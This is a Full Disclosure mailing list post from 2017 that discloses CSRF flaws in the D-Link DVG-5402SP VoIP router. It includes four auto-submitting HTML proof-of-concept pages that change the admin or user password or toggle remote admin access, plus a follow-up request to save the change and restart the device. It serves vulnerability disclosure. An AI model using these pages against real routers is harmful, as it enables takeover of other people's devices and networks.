Full Disclosure mailing list archives
CSRF vulnerabilities in D-Link DVG-5402SP
From: "MustLive" <mustlive () websecurity com ua>
Date: Mon, 31 Jul 2017 23:55:20 +0300
Hello list!There are multiple Cross-Site Request Forgery vulnerabilities in D-Link DVG-5402SP VoIP Router.
------------------------- Affected products: -------------------------Vulnerable is the next model: D-Link DVG-5402SP, Firmware RU_1.01. Other versions also must be vulnerable.
Since December 2014 the developers didn't answer me concerning vulnerabilities in DVG-5402SP and other D-Link devices, which I informed them about. Concerning these holes I informed them at 28.03.2016.
---------- Details: ---------- Cross-Site Request Forgery (WASC-09): Change admin's password: D-Link DVG-5402SP CSRF-1.html <html> <head><title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title>
</head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/goform/AspPost"; method="post"> <input type="hidden" name="K13" value="1"> <input type="hidden" name="ot_confirm_password_K13" value="1"> </form> </body> </html> Change user's password: D-Link DVG-5402SP CSRF-2.html <html> <head><title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title>
</head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/goform/AspPost"; method="post"> <input type="hidden" name="K374" value="1"> <input type="hidden" name="ot_confirm_password_K374" value="1"> </form> </body> </html> Turn off remote access to web admin panel: D-Link DVG-5402SP CSRF-3.html <html> <head><title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title>
</head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/goform/AspPost"; method="post"> <input type="hidden" name="K626" value="0"> </form> </body> </html> Turn on remote access to web admin panel: D-Link DVG-5402SP CSRF-4.html <html> <head><title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. http://websecurity.com.ua</title>
</head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/goform/AspPost"; method="post"> <input type="hidden" name="K626" value="1"> </form> </body> </html>Similarly can be changed any settings in admin panel, such as turn off telnet access.
Cross-Site Request Forgery (WASC-09):After the change, the password must be saved and the device restarted by separate GET request:
http://site/ConfigBackupForm.aspI mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7597/).
Best wishes & regards, MustLive Administrator of Websecurity web sitehttp://websecurity.com.ua
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Current thread:
- CSRF vulnerabilities in D-Link DVG-5402SP MustLive (Jul 31)